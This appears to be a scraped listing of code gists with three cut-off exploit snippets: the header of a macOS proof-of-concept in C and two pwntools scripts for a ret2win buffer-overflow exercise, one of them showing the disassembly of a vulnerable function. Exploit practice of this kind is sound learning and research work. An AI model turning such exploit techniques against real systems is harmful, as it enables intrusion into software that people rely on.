This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Written By Pan ZhenPeng(@peterpan980927) of Alibaba Security Pandora Lab | |
use it on macOS: cc poc.c -o poc while True; do ./poc ; done | |
*/ | |
#include <errno.h> | |
#include <signal.h> | |
#include <fcntl.h> | |
#include <stdio.h> | |
#include <stdlib.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
# Here's the disassembly for everything | |
""" | |
0804844b <vulnerable_function>: | |
804844b: 55 push ebp | |
804844c: 89 e5 mov ebp,esp | |
804844e: 81 ec 88 00 00 00 sub esp,0x88 | |
8048454: 83 ec 04 sub esp,0x4 | |
8048457: 68 00 01 00 00 push 0x100 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
# Set up pwntools to work with this binary | |
elf = context.binary = ELF('ret2win') | |
# Enable verbose logging so we can see exactly what is being sent. | |
context.log_level = 'debug' | |
# Print out the target address | |
info("%#x target", elf.symbols.ret2win) |
OlderNewer